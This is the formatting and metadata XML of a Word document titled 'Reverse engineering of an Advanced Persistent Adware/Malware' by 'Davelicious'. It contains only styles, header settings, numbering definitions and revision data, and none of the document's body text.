    <w:p w:rsidR="00B61C9A" w:rsidRDefault="00B61C9A" w:rsidP="00B61C9A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:right="26"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B61C9A" w:rsidRPr="00875BA3" w:rsidRDefault="00B61C9A" w:rsidP="00B61C9A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:right="26"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00B61C9A" w:rsidRPr="00875BA3" w:rsidSect="00EA60F6">
      <w:headerReference w:type="default" r:id="rId9"/>
      <w:footerReference w:type="default" r:id="rId10"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="720" w:right="476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A9" w:rsidRDefault="00D347A9" w:rsidP="00276E1C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00D347A9" w:rsidRDefault="00D347A9" w:rsidP="0027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1C" w:rsidRDefault="00276E1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1C" w:rsidRDefault="00276E1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276E1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erse engineering of an Advanced Persistent Adware/Malwar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276E1C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y Davelicious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76E1C" w:rsidRDefault="00276E1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276E1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erse engineering of an Advanced Persistent Adware/Malwar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</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00276E1C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By Davelicious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A9" w:rsidRDefault="00D347A9" w:rsidP="00276E1C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00D347A9" w:rsidRDefault="00D347A9" w:rsidP="0027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E1C" w:rsidRPr="00276E1C" w:rsidRDefault="00276E1C">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:rPr>
        <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:pPr>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:alias w:val="Author"/>
        <w:tag w:val=""/>
        <w:id w:val="-81348510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76E1C">
          <w:rPr>
            <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>Reverse engineering of an Advanced Persistent Adware/Malwa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52F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="60C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23CA5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6C46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0821"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2988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33FD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6016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2528"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6E3463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BE"/>
    <w:rsid w:val="00052DE3"/>
    <w:rsid w:val="00072991"/>
    <w:rsid w:val="00096305"/>
    <w:rsid w:val="000A30E0"/>
    <w:rsid w:val="000F2B52"/>
    <w:rsid w:val="00145F36"/>
    <w:rsid w:val="001622F5"/>
    <w:rsid w:val="00256E93"/>
    <w:rsid w:val="00266BFC"/>
    <w:rsid w:val="00276E1C"/>
    <w:rsid w:val="0030156A"/>
    <w:rsid w:val="00383D08"/>
    <w:rsid w:val="003E3A1F"/>
    <w:rsid w:val="004C5BCE"/>
    <w:rsid w:val="00526E6D"/>
    <w:rsid w:val="005277C0"/>
    <w:rsid w:val="00537E42"/>
    <w:rsid w:val="00563EE7"/>
    <w:rsid w:val="00586437"/>
    <w:rsid w:val="00596CB7"/>
    <w:rsid w:val="005A29B3"/>
    <w:rsid w:val="005C78BE"/>
    <w:rsid w:val="005D1469"/>
    <w:rsid w:val="00641C59"/>
    <w:rsid w:val="006637CB"/>
    <w:rsid w:val="006764AE"/>
    <w:rsid w:val="006F6CA6"/>
    <w:rsid w:val="00754ACD"/>
    <w:rsid w:val="007B3B4C"/>
    <w:rsid w:val="007C334F"/>
    <w:rsid w:val="00815185"/>
    <w:rsid w:val="00875BA3"/>
    <w:rsid w:val="00880255"/>
    <w:rsid w:val="00880F47"/>
    <w:rsid w:val="00896549"/>
    <w:rsid w:val="008A5F20"/>
    <w:rsid w:val="00972EDC"/>
    <w:rsid w:val="009A20E4"/>
    <w:rsid w:val="009C0EF2"/>
    <w:rsid w:val="009E479D"/>
    <w:rsid w:val="009F5DD3"/>
    <w:rsid w:val="00A0343E"/>
    <w:rsid w:val="00A525D3"/>
    <w:rsid w:val="00AE7F04"/>
    <w:rsid w:val="00B00AF5"/>
    <w:rsid w:val="00B11A96"/>
    <w:rsid w:val="00B61C9A"/>
    <w:rsid w:val="00BC3AEA"/>
    <w:rsid w:val="00C00386"/>
    <w:rsid w:val="00C16625"/>
    <w:rsid w:val="00C76E4F"/>
    <w:rsid w:val="00C92A43"/>
    <w:rsid w:val="00D2544D"/>
    <w:rsid w:val="00D347A9"/>
    <w:rsid w:val="00D6269D"/>
    <w:rsid w:val="00EA60F6"/>
    <w:rsid w:val="00F6542F"/>
    <w:rsid w:val="00F74233"/>
    <w:rsid w:val="00F842CB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86BFE-72B5-4416-AED4-338363F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C9A"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="005277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1C"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00276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2058-E56D-4292-8FF7-81BEA46B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9</TotalTime>
  <Pages>7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rse engineering of an Advanced Persistent Adware/Malware</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Dave Licious</cp:lastModifiedBy>
  <cp:revision>20</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-09-22T18:55:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-09-26T20:54:00Z</dcterms:modified>
</cp:coreProperties>
</file>